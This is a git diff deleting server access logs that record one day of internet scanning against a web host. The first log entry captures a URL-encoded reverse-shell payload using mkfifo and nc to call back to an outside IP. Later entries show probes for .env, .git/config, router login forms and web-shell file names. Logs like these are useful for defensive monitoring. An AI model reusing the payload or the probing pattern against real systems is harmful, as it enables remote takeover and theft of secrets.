a/logs/2025-09-11/npm-db-journal_09:39:21.log b/logs/2025-09-11/npm-db-journal_09:39:21.log deleted file mode 100644 index 6ba17d7..0000000 --- a/logs/2025-09-11/npm-db-journal_09:39:21.log +++ /dev/null @@ -1 +0,0 @@ --- No entries -- diff --git a/logs/2025-09-11/npm_access.log b/logs/2025-09-11/npm_access.log deleted file mode 100644 index dc755c7..0000000 --- a/logs/2025-09-11/npm_access.log +++ /dev/null @@ -1,209 +0,0 @@ -[10/Sep/2025:07:27:12 +0000] 404 - POST http 172.237.28.60 "/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=mkfifo%20%2Ftmp%2Ff%3B%20%2Fbin%2Fsh%20-i%20%3C%20%2Ftmp%2Ff%202%3E%261%20%7C%20nc%20196.251.84.66%206667%20%3E%20%2Ftmp%2Ff" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozila/5.0" "-" -[10/Sep/2025:07:35:33 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" -[10/Sep/2025:07:35:33 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" -[10/Sep/2025:07:42:46 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:07:51:22 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:08:23:51 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:08:24:25 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:08:24:57 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" -[10/Sep/2025:08:33:14 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:09:01:08 +0000] 404 - GET http 84167165-jh888-17.tcr195p888.com "/login" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" -[10/Sep/2025:09:06:34 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" -[10/Sep/2025:09:09:34 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:09:32:40 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:09:34:50 +0000] 404 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" -[10/Sep/2025:09:34:51 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" -[10/Sep/2025:09:39:31 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:09:40:41 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:09:46:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:09:46:53 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:09:57:39 +0000] 404 - POST http 172.237.28.60 "/boaform/admin/formLogin" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://172.237.28.60:80/admin/login.asp" -[10/Sep/2025:09:57:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:10:04:11 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:10:08:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:10:33:15 +0000] 403 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 150] [Gzip -] "libwww-perl/6.79" "-" -[10/Sep/2025:10:54:41 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:10:55:58 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[10/Sep/2025:10:58:41 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[10/Sep/2025:10:58:47 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:11:13:25 +0000] 200 - GET http 172-237-28-60.ip.linodeusercontent.com "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:11:13:45 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:11:13:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:11:13:53 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:11:13:55 +0000] 404 - GET http 172.237.28.60 "/security.txt" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:11:16:25 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:11:18:18 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" -[10/Sep/2025:11:23:29 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" -[10/Sep/2025:11:30:45 +0000] 404 - GET http 172.237.28.60 "/portal/redlion" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:11:56:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:11:56:16 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[10/Sep/2025:12:03:20 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:12:07:32 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" -[10/Sep/2025:12:24:25 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Iron Safari/537.36" "-" -[10/Sep/2025:12:25:02 +0000] 404 - GET http 172.237.28.60 "/webui/" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0" "-" -[10/Sep/2025:12:26:51 +0000] 404 - GET http 172.237.28.60 "/geoserver/web/" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Iron Safari/537.36" "-" -[10/Sep/2025:12:28:57 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:12:30:53 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:12:43:22 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:13:00:51 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:13:23:16 +0000] 404 - GET http 172.237.28.60 "/actuator/health" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:13:36:48 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:13:40:03 +0000] 400 - - http localhost "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:13:40:30 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[10/Sep/2025:13:40:37 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[10/Sep/2025:13:47:48 +0000] 404 - POST http 172.237.28.60 "/boaform/admin/formLogin" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://172.237.28.60:80/admin/login.asp" -[10/Sep/2025:13:47:48 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:13:48:52 +0000] 400 - - http localhost "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:14:10:15 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:14:44:57 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:14:54:49 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:14:56:31 +0000] 400 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" -[10/Sep/2025:14:56:33 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" -[10/Sep/2025:15:04:03 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:15:32:33 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:15:46:28 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:15:46:29 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:16:00:23 +0000] 404 - POST http 172.237.28.60 "/boaform/admin/formLogin" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://172.237.28.60:80/admin/login.asp" -[10/Sep/2025:16:00:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:16:06:08 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:16:31:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:16:31:40 +0000] 400 - - http localhost "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:16:51:18 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:16:59:43 +0000] 404 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" -[10/Sep/2025:16:59:55 +0000] 405 - POST http 172.237.28.60 "/" [Client 10.89.0.8] [Length 556] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" -[10/Sep/2025:17:22:38 +0000] 200 - GET http 172-237-28-60.ip.linodeusercontent.com "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:17:37:11 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:18:05:43 +0000] 400 - GET http 172.237.28.60 "/aaa9" [Client 10.89.0.8] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" -[10/Sep/2025:18:05:44 +0000] 400 - GET http 172.237.28.60 "/aab9" [Client 10.89.0.8] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" -[10/Sep/2025:18:17:08 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" -[10/Sep/2025:18:23:22 +0000] 400 - GET http 172.237.28.60 "/version" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:18:23:22 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:18:23:22 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:18:23:22 +0000] 400 - GET http 172.237.28.60 "/v1" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:18:23:22 +0000] 400 - - http localhost "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:18:23:23 +0000] 400 - - http localhost "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:18:26:53 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:18:33:38 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:18:33:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:18:33:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:18:33:55 +0000] 404 - GET http 172.237.28.60 "/sitemap.xml" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:18:43:30 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:19:10:24 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:19:14:26 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:19:23:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:19:26:53 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:19:31:44 +0000] 404 - POST http 172.237.28.60 "/boaform/admin/formLogin" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://172.237.28.60:80/admin/login.asp" -[10/Sep/2025:19:31:44 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:19:40:13 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" "-" -[10/Sep/2025:19:46:49 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" -[10/Sep/2025:19:51:37 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:19:51:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:19:51:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:19:51:44 +0000] 404 - GET http 172.237.28.60 "/security.txt" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:19:56:07 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:19:56:10 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:20:06:06 +0000] 404 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36" "-" -[10/Sep/2025:20:06:06 +0000] 405 - POST http 172.237.28.60 "/" [Client 10.89.0.8] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36" "-" -[10/Sep/2025:20:18:50 +0000] 404 - POST http 172.237.28.60 "/boaform/admin/formLogin" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://172.237.28.60:80/admin/login.asp" -[10/Sep/2025:20:18:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:20:26:46 +0000] 404 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36" "-" -[10/Sep/2025:20:26:47 +0000] 405 - POST http 172.237.28.60 "/" [Client 10.89.0.8] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36" "-" -[10/Sep/2025:20:30:38 +0000] 400 - - http localhost "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:21:13:49 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:21:17:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:21:17:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:21:17:22 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:21:17:22 +0000] 404 - GET http 172.237.28.60 "/form.html" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "curl/8.1.2" "-" -[10/Sep/2025:21:17:22 +0000] 404 - GET http 172.237.28.60 "/upl.php" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" -[10/Sep/2025:21:17:22 +0000] 404 - GET http 172.237.28.60 "/t4" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" -[10/Sep/2025:21:17:22 +0000] 404 - GET http 172.237.28.60 "/geoip/" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:21:17:23 +0000] 404 - GET http 172.237.28.60 "/1.php" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:21:17:23 +0000] 404 - GET http 172.237.28.60 "/systembc/password.php" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:21:17:23 +0000] 404 - GET http 172.237.28.60 "/password.php" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:21:32:59 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:21:35:56 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:21:35:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:21:36:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:21:36:08 +0000] 404 - GET http 172.237.28.60 "/sitemap.xml" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:21:36:12 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:21:37:04 +0000] 404 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" -[10/Sep/2025:21:37:04 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" -[10/Sep/2025:21:39:29 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:21:46:47 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:21:46:47 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:21:46:48 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:21:51:31 +0000] 404 - GET http apiv4.9hits.com "/test" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" -[10/Sep/2025:21:53:20 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:22:02:25 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:02:26 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:02:27 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:22:02:27 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[10/Sep/2025:22:16:01 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:22:19:39 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:19:39 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:22:19:40 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:22:26:08 +0000] 400 - GET http localhost "/" 